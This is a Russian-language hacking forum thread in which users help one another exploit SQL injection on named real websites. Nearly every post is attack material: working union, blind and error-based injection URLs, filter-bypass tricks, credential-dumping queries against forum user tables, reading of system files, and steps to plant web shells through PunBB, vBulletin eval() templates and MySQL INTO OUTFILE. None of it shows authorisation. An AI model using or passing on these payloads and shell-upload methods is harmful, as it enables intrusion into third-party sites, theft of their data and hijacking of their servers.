Имеется инъекция с выводом в ошибке, такого типа 1062 - Duplicate entry '38411' for key 1 . Есть ли софт, который будет дампить значение в ковычках, то есть 3841, так как последний символ отбрасывается?

P.S Скуля переберается лимитом, так и софт должен делать +1 лимит. +)

toolza от Pashkela - /thread148915.html

очень много режимов работы

-PRIVAT- said:
Имеется инъекция с выводом в ошибке, такого типа 1062 - Duplicate entry '
3841
1' for key 1 . Есть ли софт, который будет дампить значение в ковычках, то есть 3841, так как последний символ отбрасывается?
P.S Скуля переберается лимитом, так и софт должен делать +1 лимит. +)




PHP:




Вот, написал скрипт, все действия прокомментировал, запрос поменяешь под себя.

как узнать версию mybb

Походу blind sql

http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+

Выдает то же,что по запросу

http://www.mirdela.ru/news.php?nid=-351

А если что нибудь убрать,выдаст

2Can not select content

Как такую раскрутить?хотя бы версию узнать.

Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.


нет там есть вывод. Версия у тебя 4.1.25-log.

Я особо не вдавался в подробности, поэтому покажу как я на горячую нашёл.

Вот запрос - http://www.mirdela.ru/news.php?nid=351/**/union/**/select/**/version(),version(),version(),version(),version(), version(),version(),version(),version()/*

Сделай поиск по 4.1.25-log И увидишь на странице где идёт вывод.

Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.


http://www.mirdela.ru/news.php?nid=351+UNION+SELECT+1,2,AES_DECRYPT%28AE S_ENCRYPT%28CONCAT_WS%280x3a,Version%28%29,Databas e%28%29,User%28%29%29,0x71%29,0x71%29,4,5,6,7,8,9--

Version: 4.1.25-log

Database: nsk24ru0_realty

User: nsk24ru0_realty@localhost

колонок 9 а не 10..order by юзай

Шелл в punBB, кто знает как?

Gorev said:
Шелл в punBB, кто знает как?


а какая версия?

Заливка шелла в PunBB 1.2.17

admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz

шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)


================================================== =========
PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability
================================================== =========
@Title: PunBB Image Upload 1.0 Shell Upload Vulnerability
@Author: The_Exploited aka l3d aka Spoof
@Mail: spoof@live.it
@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
@PHP File Bugged: http://mysite.com/punbb/uploadimg.php
@Shellz: Upload the shell to "uploadimg.php"
@Mod Download: http://www.punres.org/download.php?id=1523
@Mod Version: 1.0
@Date: 2010-04-09

547 said:
Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)


version 1.2.14 ничего похожее на packager там нет... (

Gorev said:
version 1.2.14 ничего похожее на packager там нет... (


А ты это пробовал ?

http://seclists.org/bugtraq/2007/Apr/174

kfor said:
А ты это пробовал ?
http://seclists.org/bugtraq/2007/Apr/174


не могу его использовать так как пасс узнал из других источников нежели из базы форума, не знаю префикс..а гадать его долго...

ктото с таким сталкивался?

http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

547 said:
ктото с таким сталкивался?
http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15




Code:
http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0) ,concat((select+table_name+from+information_schema .tables+limit+0,1),floor(rand(0)*2))+from+informat ion_schema.tables+group+by+2+limit+1)a)

"]
[Feldmarschall] said:

Code:
http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0) ,concat((select+table_name+from+information_schema .tables+limit+0,1),floor(rand(0)*2))+from+informat ion_schema.tables+group+by+2+limit+1)a)



выдает:


查询失败: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.tables group by 2 limit 1)a)' at line 1

547 said:
выдает:


Он выдаёт при запросе http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0) ,concat((select+table_name+from+information_schema .tables+limit+0,1),floor(rand(0)*2))+from+informat ion_schema.tables+group+by+2+limit+0,1)a)

Duplicate entry 'CHARACTER_SETS1' for key 1 То есть имя первой таблицы. Лимитом вот так перебирай их, лимит в середине запроса.

547, ты пробелы убери >

да я на самом деле шарю error based но иногда теряю бдительность

спасибо за помощь,убрал пробелы и все ок

http://arbaleta.net/detail/1283'/

wtf?

Lilo said:
http://arbaleta.net/detail/1283'/
wtf?


По-моему там ничего нет.

Lilo said:
http://arbaleta.net/detail/1283'/
wtf?


Просто ошибка вроде.

есть скуля

http://www.libyaonline.com/business/pages.php?cid=298 order by 1 --

пишу union пишет ошибку

http://www.libyaonline.com/business/pages.php?cid=298%20union%20select%201/*

пробывал ч-з blind не выходит

http://www.libyaonline.com/business/pages.php?cid=298+and+ascii(substring((select+1+fr om+users+limit+0,1),1,1))>1--

или

http://www.libyaonline.com/business/pages.php

?cid=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from users group by x)a)--

Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?

AloneKiller said:
Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?


Через модули тем куча читай

http://www.realitytvworld.com/index/articles/summary.php?i=133

shell_c0de:Еще раз такой пост увижу в БАН!

вам влом описать суть вопроса или тут должны догодатся и раскручивать вам ?

http://www.realitytvworld.com/index/articles/summary.php?i=133 or(1,2)=(select*from(select name_const((select+version()),1),name_const((selec t+version()),1))a)

помогите найти админку. Нашел /controlpanel/ & /login.php

Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(

jecka3000 said:
помогите найти админку. Нашел /controlpanel/ & /login.php
Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(


Ссылку не выложишь? Как это: авторизацию прошел и никуда не редиректили?

jecka3000 said:
помогите найти админку. Нашел /controlpanel/ & /login.php
Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(


Извини не выдержал.... У тебя перед глазами сайт и ты не нашёл где админка, а хочешь что бы мы могли угадать по двум словам? =)

Лан чтоб уж не пустозвонить ... ты из какого браузера заходишь? Иногда, бывает, что только в осле нормально работают некоторые админки. Так же может у тебя появились полномочия править статьи.. новости... походи по сайту и посмотри....

AloneKiller said:
Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?


В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:

http://localhost/forum/faq.php?cmd=phpinfo();

tracy said:
В админке:
Plugins & Products -> Plugin Manager -> [Add New Plugin]
вписываем
eval($_REQUEST[cmd]);
в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем
шелл будет тут:
http://localhost/forum/faq.php?cmd=phpinfo();


К чему весь этот цирк? потом все новичку привыкают при первом же вопросе постить в эту ветку, которая повторяет по тысячному разу одни и те же вопросы...посылать надо в поиск ...или если и хочется поможь то непосредственно линк на ветку, сейчас начнутся вопросы что такое евал итд и тп...

Доброго времени суток, уважаемые форумчане!

Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-)

Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки...

Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел...

Заранее благодарю за помощь...

z0mbyak said:
Доброго времени суток, уважаемые форумчане!
Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-)
Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки...
Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел...
Заранее благодарю за помощь...



одной подменой mime-type не отделаешься - там еще проверка расширения идет.

Не подскажете, как обойти фильтрацию.

module.php?id=104+union+select+1,version(),3,4--+

выводит 5.0.91-community

проверяю

module.php?id=104+union+select+1,2,version(),3,4+f rom+information_schema.tables--+

выводит версию, columns так же

Когда пытаюсь вывести таблицы table_name перебрасывает на страницу


406 Not Acceptable
An appropriate representation of the requested resource /products.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


column_name так же и из information_schema.columns

Выводится только table_schema (information_schema.tables/columns), остальное видимо фильтруется.

Пробовал обойти

CoLuMn_NaMe

cOlUmN_nAme

и т.д.

c table_name так же. Перебрасывает на 406 Not Acceptable

Подскажите как обойти фильтрацию.

Заранее благодарен.

Так и должно быть и нету тут фильтрации

module.php?id=104+union+select+1,version(),3,4--+

Это правильный запрос.

tracy said:
Так и должно быть и нету тут фильтрации
module.php?id=104+union+select+1,version(),3,4--+
Это правильный запрос.



Что? У него то же самое, он хочет не только версию, но и инфу из inf. schema вытащить

попугай прав. Зачем мне одна версия, имя бд и юзер. Мне нужна инфа о таблицах и колонках из information_schema.tables и information_schema.columns

Фильтруются при запросе column_name и table_name

table_schema нет, но этого мало. Иначе зачем мне уязвимость?

2 auth_root

Mod_Security


Code:
module.php?id=104+union+select+1,/*!table_name*/,3,4+from+information_schema.tables



Code:
module.php?id=104+union+select+1,/*12345!table_name*/,3,4+from+information_schema.tables

Либо сразу весь запрос загони в комментарии.

Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows.

Есть возможность читать файлы вот так:

id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696 e69),4+--+

где 0x633a5c626f6f742e696e69 - C:/boot.ini

Инклуд тоже не нашел, иначе бы в C:/ файл и залил.

Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти...

Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи?

Сталкиваюсь с таким в первый раз, потерялся))

brutos попробуй

c:\wwwroot\имя сайта\

c:\wwwroot\имя сайта\htdocs\

c:\wwwroot\имя сайта\www\

c:\wwwroot\htdocs\

и т.д.

Konqi, спасибо. Пока глухо, буду искать дальше, но уже хоть есть от чего оттолкнуться)

Redwood

Спасибо большое. Помогло. +

brutos

C:\WebServers\home\localhost\www

=)

auth_root said:
C:\WebServers\home\localhost\www


Ага, смотрел. Ну там явно не Denwer

brutos попробуй те же пути на других дисках, например D:\

вот из такого что-то выжать можно?

http://partnervanjedromen.nl/search_result.php?Sex=Female%27&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44

или подскажите где почитать инфу

http://partnervanjedromen.nl/search_result.php?Sex=Female') and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30--+&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44

brutos said:
Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows.
Есть возможность читать файлы вот так:
id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696 e69),4+--+
где 0x633a5c626f6f742e696e69 - C:/boot.ini
Инклуд тоже не нашел, иначе бы в C:/ файл и залил.
Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти...
Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи?
Сталкиваюсь с таким в первый раз, потерялся))


пробуй варианты

C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err

C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log

C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err

C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log

C:\Program Files\MySQL\data\hostname.err

C:\Program Files\MySQL\data\mysql.log

C:\Program Files\MySQL\data\mysql.err

C:\Program Files\MySQL\data\mysql-bin.log

C:\MySQL\data\hostname.err

C:\MySQL\data\mysql.log

C:\MySQL\data\mysql.err

C:\MySQL\data\mysql-bin.log

C:\Program Files\MySQL\MySQL Server 5.0\my.ini

C:\Program Files\MySQL\MySQL Server 5.0\my.cnf

C:\Program Files\MySQL\my.ini

C:\Program Files\MySQL\my.cnf

C:\MySQL\my.ini

C:\MySQL\my.cnf

Как залить шелл в InstantCMS? Нигде не могу найти.

есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?

P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).

Vlad3d said:
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).


/thread43966.html (https://antichat.live/threads/43966/)

Пункт 2.2

Проверить привилегии на запись можно вот так:


http://www.stylisdesigns.com/catalog.php?ID=-79+union+select+1,2,3,file_priv,5,6,7,8,9,0,1,2,3, 4,5+from+mysql.user+where+user=%27swdata%27--+


N - no = нет прав

Y - yes = есть права

Vlad3d said:
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на заливку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).


Попробуй поискать инклюды в админке. Для заливки шелла через инжект Проверь эти пункты:

1. Экранирование ковычек он же magic_quotes_qpc. Эта шняга должна быть установлена на off в php.ini. Попробуй в любое поле вписать текст 'lol' и если запрос обработается успешно и выведет "lol", то по первому пункту проходит.

2. Права доступа к счеме mysql. Попробуй вывести что угодно, даже циферки из mysql.user. Пример :UNION SELECT 1,2,3 from mysql.user. Если запрос обработается также как и при UNION SELECT 1,2,3, то по этому пункту тоже проходит.

3. file_priv. Сперва узнаем через какого юзера мы подключены к бд. Для этого отправляем запрос UNION SELECT user(),2,3. Например нам вывело root@localhost. Теперь проверяем file_priv у нашего юзера - select file_priv,2,3 from mysql.user where user='root' (если magic_quotes_qpc=on, то root заменить на хекс - 0x726F6F74. Соответственно мы тогда не проходим по 1 пункту, но зато можем читать файлы через функцию load_file). Если выдало Y - у нашего юзера есть файл привелигии и мы проходим по этому пункту else не проходим

4. Путь. Мы должны знать полный путь от корня сервера. например: /home/www/site/

5. Возможность запись в папку. Если не пишется в /home/www/site/ можно попробовать записать в /home/www/site/images/ к примеру.

Собственно как лить :

union select 'наш пхп код',2,3 from mysql.user into outfile '/home/www/site/images/lol.php' . Если по всем вышеперечисленным пунктам все ок и вы сделали все правильно, то по адресу http://site/images/lol.php будет лежать наш файлиг. Если что-то непонятно пиши в пм - всегда рад помочь

Mirrey said:
Как залить шелл в InstantCMS? Нигде не могу найти.


Поиск для чего на форуме!?

Когда то было выполнение кода в админке, ща хз.

/threadnav189469-2-10-instant%2Bcms.html

ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака

KandidaT'S said:
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+informati on_schema.PROFILING+--+

Табла PROFILING - системная табла и в ней ничего полезного ты не найдешь, и она находится в счема information_schema. Поэтому перед таблой нужно написать счему откуда выводим.

KandidaT'S, давай выведем таблицы:


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28table_name%29, 5,6,7+from+information_schema.tables--


Ну, а дальше выбирай таблицы и выводи колонки таким образом :


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,5,6,7+from+information_schema.columns+where+table _name=0x7068706262666f72756d735f61636c5f7573657273--


table_name=TABLE_NAME в Hex виде. Hex вид можно получить тут (http://x3k.ru)

Затем, как выведешь колонки, выводи данные так:


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,Колонка ,колонка,колонка),5,6,7+from+TABLE_N AME


Где TABLE_NAME - имя таблицы откуда выводим.

KandidaT'S said:
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака


потому что там ничего нет, а вот это тебе будет интересней


Code:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,user_ password),5,6,7+from+xtremelabs_forums.phpbbforums _users+limit+1,1+--+

KandidaT'S said:
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака


БД


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28SCHEMA_NAME%20 SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_ schema.SCHEMATA

information_schema:xtremelabs_forums:xtremelabs_si te:xtremelabs_tforums

Tables


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20S EPARATOR%200x3a%29%20,5,6,7%20FROM%20information_s chema.TABLES%20limit%200,1



Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,database%28%29%20,5,6,7%20FRO M%20information_schema.TABLES%20limit%200,1

БД текущая -> xtremelabs_site -> 0x787472656d656c6162735f73697465


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20S EPARATOR%200x3a%29%20,5,6,7%20FROM%20information_s chema.TABLES%20WHERE%20TABLE_SCHEMA=0x787472656d65 6c6162735f73697465

admins:articles:articlescategories:categories:news :newscategories

там нет таблицы PROFILING, она в другой БД.


Code:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,TABLE_SCHEMA%20%20,5,6,7+from +information_schema.TABLES+where+table_name=0x5052 4f46494c494e47%20--

information_schema

она в схеме


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,%20count%28*%29%20,5,6,7%20FR OM%20information_schema.PROFILING



Другие новости категории
[01.01.1970]
0


она пустая, там ниче нет.

Всем Спасибо

Всем привет,

как можно раскрыть пути в joomla 1.5.

копипась моего поста, не помню где он.

Joomla_1.5.15-Stable-Full_Package.zip

у себя проверял


Code:
http://localhost/lastjoom/index.php?limitstart=-5



Warning: Invalid argument supplied for foreach() in Z:\home\localhost\www\lastjoom\components\com_cont ent\models\frontpage.php on line 104


может поможет.

э хз как обойти в таком раскладе, может подскажем:

http://localhost/script.php

POST

ref=BIG'

что не пробовал на все одинаков ответ ((

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3

Что за трабла тут со скобками?

YuNi|[c said:
э хз как обойти в таком раскладе, может подскажем:
http://localhost/script.php
POST
ref=BIG'
что не пробовал на все одинаков ответ ((
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Что за трабла тут со скобками?


ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.

ref=BIG') and 1=1 а так выдать

ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать Unknown column '10000'

ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД

Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11

Welemir said:
Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11


Его компилировать не надо, вроде, это sh скрипт.

Создай файл, закинь в него содержимое сплойта, и запусти ./exploit.sh

Strilo4ka said:
копипась моего поста, не помню где он.
Joomla_1.5.15-Stable-Full_Package.zip
у себя проверял

Code:
http://localhost/lastjoom/index.php?limitstart=-5

может поможет.


Спасибо огромное,

Но видимо не все версии подвержены, у некоторых не показывается,

Expl0ited said:
ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.
ref=BIG') and 1=1 а так выдать
ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать
Unknown column '10000'
ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД


Вообще то вот так выглядит запрос по настояшему:


Code:
script.php?Sex=female&YearFrom=18&YearTo=40'

а ответ:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3

на тот же


Code:
script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3

пробовал разные варианты и floor rand не пашет ((

PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи

YuNi|[c said:
Вообще то вот так выглядит запрос по настояшему:

Code:
script.php?Sex=female&YearFrom=18&YearTo=40'

а ответ:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
на тот же

Code:
script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
пробовал разные варианты и floor rand не пашет ((
PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи




Code:
script.php?res=1&Sex=female&YearFrom=11+YEAR)+and+1=if(substring(version(),1,1 )=5,0,1)+--+

Друзья, по всей видимости есть уязвимость на одном сайте:

http://site.com/feedback/index/20'

при этом вижу ошибку:

A Database Error Occurred

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6

SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10​

Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!

Derec said:
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10​
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!


там фильтрация символов в движке, по этому ничего не выйдет.

Derec said:
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10​
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!


Инъекция в лимите.

В данном случае инъекция не возможна из за присутствия order by.

Если нет order by, то крутиться, как обычно, через union select

Если позволяют условия, то попробуй сразу залить шелл:

1 limit 1 into outfile '/path/shell.php' lines terminated by "" --

1 limit 1 into outfile '/path/shell.php' fields terminated by '' optionally enclosed by "" --

вот тоже интересный случай:

http://www.asiafuns.com/search_results.php?country=163+and+substring%28ver sion%28%29,1,1%29=5+--+ все нормуль

http://www.asiafuns.com/search_results.php?country=163+and+ascii%28substri ng%28%28select+column_name+from+information_schema .columns+limit+1,1%29,1,1%29%29%3E0+--+ редиректит на главную

тоже самое если пробовать union select

http://www.asiafuns.com/search_results.php?country=163+order+by+3+--+ норм

http://www.asiafuns.com/search_results.php?country=163+union+select+1,2,3+--+ редирект

попытки обхода с сменой регистра и добавлением комментариев /*!union+select*/ не проходит.

в какую сторону копать?

http://www.asiafuns.com/search_results.php?country=163+and+substring%28SEL ECT%20version%28%29,1,1%29=5+--+

select не фильтруется

Redwood, я понял. С шеллом не получилось. Но вот, что известно:

Инъекция в числовом параметре есть:

http://site.com/menu/show/121%20and%201=1/33/#main

Результат:

A Database Error Occurred

Error Number: 1054

Unknown column '20and' in 'where clause'

SELECT * FROM menu WHERE id=121%20and%201=1​

Фильтруются пробелы, символы : ( , ) , /**/, +

Можно ли раскрутить скуль в таком случае?

подзапросы + join

Digger said:
пробуй POST'om


Это через программу? как бы я так понимаю я итак делаю post'om через браузер


Strilo4ka said:
подзапросы + join


подзапросы не помогают, потому что фильтруются даже скобочки в самой url

что делать если union и select в связке фильтруются

LBC said:
что делать если union и select в связке фильтруются


Подзапросы, крутить как слепую, вывод в ошибке


Code:
sql.php?id=2+union+(select+1,2,table_name,4,5+from +information_schema.tables)

and etc


Code:
sql.php?id=2+and+(select+ascii(substring((select+t able_name+from+information_schema.tables+limit+0,1 ),1,1))+from+information_schema.tables+limit+0,1)>66

and etc

Вывод через ошибку без использования Union

Для Mysql 4.1>=


Code:
sql.php?id=2+and+(select+1+from+(select+count(*),c oncat((select+table_name+from+information_schema.t ables+limit+0,1),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)



Code:
sql.php?id=2+or+1+group+by+concat((select+table_na me+from+information_schema.tables+limit+0,1),floor (rand(0)*2))+having+min(0)

Для Mysql 5.1>=


Code:
sql.php?id=2+and+extractvalue(1,concat(0x5c,((sele ct+table_name+from+information_schema.tables+limit +0,1))))

Для Mysql 5.0.12 > 5.0.64


Code:
sql.php?id=1+or+(1,2)=(select*from(select+name_con st((select+table_name+from+information_schema.tabl es+limit+0,1),1),name_const((select+table_name+fro m+information_schema.tables+limit+0,1),1))a)


Можно еще попробовать обойти так


Code:
sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4,5



Code:
sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5



Code:
sql.php?id=2/**/union/**/select/**/1,2,3,4,5



Code:
sql.php?id=2+union+%0A+select+1,2,3,4,5

Вариантов куча, всего не перечислишь, думаю этого должно хватить

Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?

-PRIVAT- said:
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?


http://zalil.ru/29741714

Нашел вот такую вещь


Code:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+

Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ?

cipa21 said:
Нашел вот такую вещь

Code:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+

Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ?


Так вот оно: ""

Можешь на свой код заменить...

Привет подскажите плиз как оборвать запрос на данном сайте

http://allkupchino.ru/miss/miss.phtml?n=46{SQL}

http://allkupchino.ru/bbs/ob.phtml?nb=42{SQL}

Если подставить (+; --+; /*) то результат не выводится, значит ошибка = (

Byrger said:
Привет подскажите плиз как оборвать запрос на данном сайте
http://allkupchino.ru/miss/miss.phtml?n=46{SQL}
http://allkupchino.ru/bbs/ob.phtml?nb=42{SQL}
Если подставить (+; --+; /*) то результат не выводится, значит ошибка = (


По моему там ваапще нет скули..

